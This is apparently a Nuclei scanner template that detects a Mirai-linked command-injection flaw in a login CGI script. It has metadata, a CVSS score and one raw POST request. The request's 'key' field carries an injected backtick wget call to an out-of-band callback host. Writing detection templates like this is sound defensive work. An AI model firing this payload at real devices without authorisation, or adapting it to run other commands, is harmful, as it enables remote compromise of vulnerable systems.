id: mirai-unknown-rce

info:
  name: Mirai - Remote Command Injection
  author: gy741
  severity: critical
  description: |
    Mirai is susceptible to an unknown exploit that targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection vulnerability.
  reference:
    - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: mirai,rce,oast

http:
  - raw:
      - |
        POST /cgi-bin/login.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        key=';`wget http://{{interactsh-url}}`;#

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

# digest: 4a0a00473045022062d724e3f1b331b4295e1dcd33f8886110d415f1202ad611c79b083439f82c66022100d989e0b21234bcd97de86d3f2b9af48a6763e672816e2dc0c3ee032acae2da14:922c64590222798bb761d5b6d8e72950
